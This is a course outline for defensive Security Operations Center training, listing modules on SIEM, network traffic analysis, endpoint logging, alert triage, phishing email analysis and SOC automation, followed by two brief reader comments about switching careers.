The Security Operations Center (SOC) is the central nervous system of any organization's
cybersecurity efforts, responsible for continuously monitoring, detecting, investigating, and
responding to cyber threats. In today's rapidly evolving threat landscape, SOC teams must be
equipped with the latest tools, techniques, and strategies to defend against attacks, analyze
network traffic, and respond efficiently to incidents.
This course provides a comprehensive overview of SOC functions, introducing participants to
the tools and techniques used by security teams to protect organizations. Through practical
exercises and theoretical knowledge, participants will gain expertise in security information and
event management (SIEM), threat intelligence, network traffic analysis, endpoint defense,
malware identification, alert triage, and SOC automation. The course is designed for security
analysts, SOC engineers, and anyone looking to enhance their skills in cybersecurity operations.
Course Objectives:
• Understand the structure and function of Security Operations Centers.
• Develop skills in using SIEM tools for log analysis, threat detection, and incident
response.
• Gain proficiency in network traffic analysis and identifying malicious activities.
• Learn to defend endpoints, interpret security logs, and identify malware.
• Improve alert triage efficiency and email analysis for threat detection.
• Explore strategies for continuous improvement, SOC automation, and enhancing team
workflows.
Module 1: Security Operations Teams, Tools, and Mission Overview
Topics:
• Welcome to the Blue Team
• SOC Foundations
• SOC Organization and Functions
• SOC Data Collection
• Introduction to SIEM
• Building SIEM Queries
• SIEM Visualizations and Dashboards
• Threat Intelligence Platforms
• Alert Generation and Processing
• Incident Management Systems and SOAR
Exercises:
• Using a SIEM for Log Analysis
• Advanced SIEM Log Searching
• Crafting SIEM Visualizations and Dashboards for Threat Hunting
• Using Threat Intelligence Platforms
• Incident Management Systems
Module 2: Network Traffic Analysis
Topics:
• Network Architecture
• Traffic Capture and Analysis
• Understanding DNS
• DNS Analysis and Attacks
• Understanding HTTP
• HTTP(S) Analysis and Attacks
• How HTTP/2 and HTTP/3 Work
• Analyzing Encrypted Traffic for Suspicious Activity
• Common Protocols for Post-Exploitation
Exercises:
• DNS Requests, Traffic, and Analysis
• Analyzing Malicious DNS
• Wireshark and HTTP/1.1 Analysis
• HTTP/2 and HTTP/3 Traffic Analysis with Wireshark
• Analyzing TLS Encrypted Traffic Without Decryption
Module 3: Endpoint Defense, Security Logging, and Malware Identification
Topics:
• Common Endpoint Attack Tactics
• Endpoint Defense in Depth
• Windows Logging – Formats, Channels, and Audit Policies
• Linux Logging – Syslog, Protocols, and Daemons
• Interpreting Security-Critical Log Events
• Log Collection, Parsing, and Normalization
• Identifying Potentially Malicious Files
• Dissecting Common Malware File Types
Exercises:
• Threat Hunting with a SIEM Using Windows Logs
• Log Enrichment and Visualization
• Dissecting Common Malware File Types
Module 4: Efficient Alert Triage and Email Analysis
Topics:
• Alert Triage and Analysis
• Structured Analytical Techniques for Alert Investigation
• Mental Models for Security Analysts
• Incident Documentation and Investigation Quality
• Analysis OPSEC for Defenders
• Detecting Malicious Emails through Email Header Analysis (SPF, DKIM, DMARC)
• Email Content, URL, and Attachment Analysis
Exercises:
• Alert Triage and Prioritization
• Structured Analysis Challenge
• High-Quality Incident Documentation
• Analyzing Phishing Email Content and Headers
Module 5: Continuous Improvement, Analytics, and Automation
Topics:
• Reducing Burnout and Retention Issues in the SOC
• False Positive Reduction – Analytic Features and Log Enrichment
• New Analytic Design, Testing, and Sharing
• Alert Tuning Methodology
• SOC Automation and Orchestration (with and without SOAR)
• Improving Analyst Efficiency and Workflow
• Methods for Quickly Containing Identified Intrusions
• Skill and Career Development for SOC Staff
Exercises:
• Alert Tuning and False Positive Reduction
• SOC Automation – File Analysis
• SOC Automation – Incident Containment
Conclusion
By the end of this course, participants will be well-versed in the fundamentals of security
operations, including the ability to monitor and analyze network traffic, identify and respond to
threats, protect endpoints, and optimize SOC operations. They will have hands-on experience
using critical SOC tools, from SIEM to threat intelligence platforms, and will be equipped to
handle complex incidents, perform threat hunting, and contribute to the overall improvement of
SOC processes.
2024-09-24
Saurav Chowdhury
Actually I have no idea about this, but I am interested in switching my career to this. Is this possible?
2024-10-09
Mohammad shahirul Haque
Maybe understand it better